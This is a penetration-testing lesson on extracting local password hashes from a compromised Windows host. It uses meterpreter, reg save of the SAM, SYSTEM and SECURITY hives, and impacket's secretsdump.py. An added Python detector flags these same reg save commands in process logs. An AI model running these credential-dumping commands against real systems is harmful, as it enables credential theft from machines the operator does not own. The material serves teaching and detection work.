# Lesson 56: Extracting the Target Machine's Hashes Offline

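In many environments, uploading or running mimikatz is not permitted, so offline hash extraction from a standalone machine that is not a domain controller becomes especially important.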

In meterpreter, use the `shell` command to switch to an interactive cmd prompt.\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqZwCb3fJQuzQbz9%2F647ac3d1d83b7d7711b2cfd0ce18f1d5.jpg?generation=1551060454473655\&alt=media)

Using `reg save` keeps the hash files that have to be downloaded from the target machine smaller.

* `reg save HKLM\SYSTEM sys.hiv`
* `reg save HKLM\SAM sam.hiv`
* `reg save hklm\security security.hiv`

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqZyPkJcrF9MMzfN%2Fcebaa1fc93231bc1aaf7738c222b5ac6.jpg?generation=1551060442186196\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwq_-tzd5-w56bVyj%2Ff2dc08a2bd64fc29ec0189933b4442dc.jpg?generation=1551060435460219\&alt=media)
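A defender's view of the `reg save` commands above, as an added example that is not part of the original lesson: a Python check that scans process-creation command lines (for instance from Sysmon Event ID 1 or Security event 4688 with command-line auditing) and raises severity when SAM and SYSTEM are saved on the same host within a short window. The event tuples, host names and the 10-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (time, host, command line); not real logs.
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:00", "WS01", r"reg save HKLM\SYSTEM sys.hiv"),
    ("2024-01-01T10:00:05", "WS01", r"reg save HKLM\SAM sam.hiv"),
    ("2024-01-01T10:00:09", "WS01", r"reg save hklm\security security.hiv"),
    ("2024-01-01T11:00:00", "WS02", r'reg.exe  SAVE "HKEY_LOCAL_MACHINE\SAM" C:\Temp\a.tmp /y'),
    ("2024-01-01T11:30:00", "WS03", r"reg save HKLM\SOFTWARE\Vendor backup.hiv"),
    ("2024-01-01T12:00:00", "WS04", r"reg query HKLM\SAM"),
]

# Matches reg[.exe] save <HKLM|HKEY_LOCAL_MACHINE>\<SAM|SYSTEM|SECURITY> <file>, case-insensitive,
# with optional quotes. The hive must be the whole key, so HKLM\SYSTEM\CurrentControlSet is ignored.
REG_SAVE = re.compile(
    r'(?:^|[\\/\s"])reg(?:\.exe)?"?\s+save\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)"?\s+\S',
    re.IGNORECASE,
)

def detect_hive_dumps(events, window=timedelta(minutes=10)):
    """Return one alert per host. Severity is 'high' when SAM and SYSTEM are both
    saved within `window`: SYSTEM holds the boot key that protects the SAM hashes."""
    per_host = {}
    for ts, host, cmdline in events:
        m = REG_SAVE.search(cmdline)
        if m:
            per_host.setdefault(host, []).append((datetime.fromisoformat(ts), m.group(1).upper()))
    alerts = []
    for host, hits in sorted(per_host.items()):
        hives = sorted({h for _, h in hits})
        sam = [t for t, h in hits if h == "SAM"]
        system = [t for t, h in hits if h == "SYSTEM"]
        paired = any(abs(a - b) <= window for a in sam for b in system)
        alerts.append({"host": host, "hives": hives, "severity": "high" if paired else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in detect_hive_dumps(SAMPLE_EVENTS):
        print(alert)
```
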

meterpreter has a built-in `download` command.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwq_1mGdSy2oNFNJR%2F336cd95e4be157c266efcd04d9ddc064.jpg?generation=1551060433395071\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwq_3fjfz7O6g0WpG%2F3f2d037ed7ac0197c01e95b7651fad41.jpg?generation=1551060430958673\&alt=media)

## Offline extraction:

This lesson uses secretsdump.py from impacket. Default path on Kali: `/root/impacket/examples/secretsdump.py`

**The command is as follows:**

```bash
root@John:/tmp# python /root/impacket/examples/secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwq_506iVMWINparZ%2Fced7254cc160ced11f2f3f512df53aec.jpg?generation=1551060449500525\&alt=media)

> Micropoor
